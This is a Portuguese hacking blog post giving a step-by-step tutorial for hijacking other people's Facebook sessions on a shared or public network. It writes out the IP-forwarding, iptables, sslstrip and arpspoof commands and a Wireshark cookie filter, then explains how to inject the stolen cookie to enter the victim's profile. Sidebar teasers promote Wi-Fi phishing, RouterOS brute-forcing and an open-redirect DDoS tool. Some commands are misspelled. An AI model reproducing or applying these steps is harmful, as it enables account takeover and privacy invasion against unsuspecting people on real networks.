Pular para o conteúdo principal

Hackeando Facebook com Wireshark e Cookie Injector

Achei esse tuto legal e funcional e resolvi postar aqui no blog.


Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve.

Vamos precisar de:


  • Uma distro Linux para facilitar
  • Windows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac)
  • SSLStrip
  • Wireshark
  • Arpspoof
  • Greasemonkey
  • Cookie injector para Greasemonkey
  • Firefox ou Iceweasel

Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil.

Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra...

Vamos ao tuto então!

Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo:
 echo 1 > /proc/sys/net/ipv4/ip_forwarding


O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego:

 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o tráfego:
 sslstrp -a -l 8080


Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando arpspoof. Mantenha sempre as 2 abas com os 2 comandos rodando em quanto estiver capturando o tráfego:

 arpspoof -i eth0 -t ip_do_alvo ip_do_roteador
arpspoof -i eth0 -t ip_do_roteador ip_do_alvo



E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No wireshark, inicie a captura de pacotes, e para facilitar no filtro de pacotes coloque o seguinte filtro:

 http.cookie contains datr


Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um site como por exemplo o Facebook veja o que acontece:


Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão direito nele vá em Copy > Bytes > Printable Text Only:


Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do alvo. Vá então para a página do Facebook e aperte ALT + C para abrir uma janelinha bem no meio da página. Nesta janelinha cole o que copiamos antes:


Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso, agora é só recarregar o Facebook e ver se funcionou:


E ai está! Estamos no perfil da vítima!



Algumas considerações finais:
  • Isto funciona não só no Facebook, praticamente todos os sites geram cookies, então praticamente todos os sites (na verdade a culpa não é do site) estão vulneráveis a esse tipo de ataque.
  • Se a pessoa estiver logando automaticamente porque ela marcou a caixa "Mantenha-me conectado" anteriormente pode ser que isso não funcione.

Comentários

Postagens mais visitadas deste blog

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de...

MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. Desenvolvedores: Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa Projeto:   github.com/mkbrutusproject/mkbrutus 01 Passo Verifique a versão atual do python em seguida realiza a instalação da versão 3 root@kali:~# python –version (Exibe a versão do Python) root@kali:~# apt-get install python3 (Realiza a instalação do Python 3) 02 Passo Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da ver...

UFONet Open Redirect DDoS Attack

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet. See this links for more info: https://www.python.org/downloads/ http://pycurl.sourceforge.net/ Installing UFONet UFONet runs on many platforms. It requires Python (2.x.y) and the following library: - python-pycurl - Python bindings to libcurl On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl Source libs: Searching for ‘zombies’ UFONet will search on google results for possible ‘Open Redirect’ vulnerable sites. A common query string should be like this: ‘proxy.php?url=’ ‘check.cgi?url=’ ‘checklink?uri=’ ‘validator?uri=’ So for example, you can begin a search with: ./ufonet -s 'proxy.php?url=' At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable. Wanna check if they are valid zombies? (Y/n) Also, y...